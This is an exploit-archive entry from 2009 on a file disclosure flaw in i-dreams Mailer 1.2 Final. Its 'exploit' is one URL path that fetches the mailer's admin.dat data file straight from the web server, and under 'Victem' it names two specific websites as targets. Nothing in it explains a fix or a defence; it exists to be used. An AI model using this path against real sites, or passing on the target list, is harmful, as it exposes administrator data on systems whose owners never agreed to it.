id: 4870
date: 02/20/2009
title: i-dreams Mailer 1.2 Final (admin.dat) File Disclosure Vulnerability
author: Pouya_Server
cves: 

===================================================================
i-dreams Mailer 1.2 Final (admin.dat) File Disclosure Vulnerability
===================================================================


#########################################################
---------------------------------------------------------
Portal Name: i-dreams Mailer
Version : 1.2 Final
Author : Pouya_Server 
---------------------------------------------------------
#########################################################
[Xpl]:
http://site.com/cgi-bin/budmail/data/admin.dat
------------------------------------------
Victem :
http://www.ttscreens.co.uk
http://www.roadkilleyeware.com
---------------------------------------------------------
#########################################################



#  0day.today [2023-03-22]  #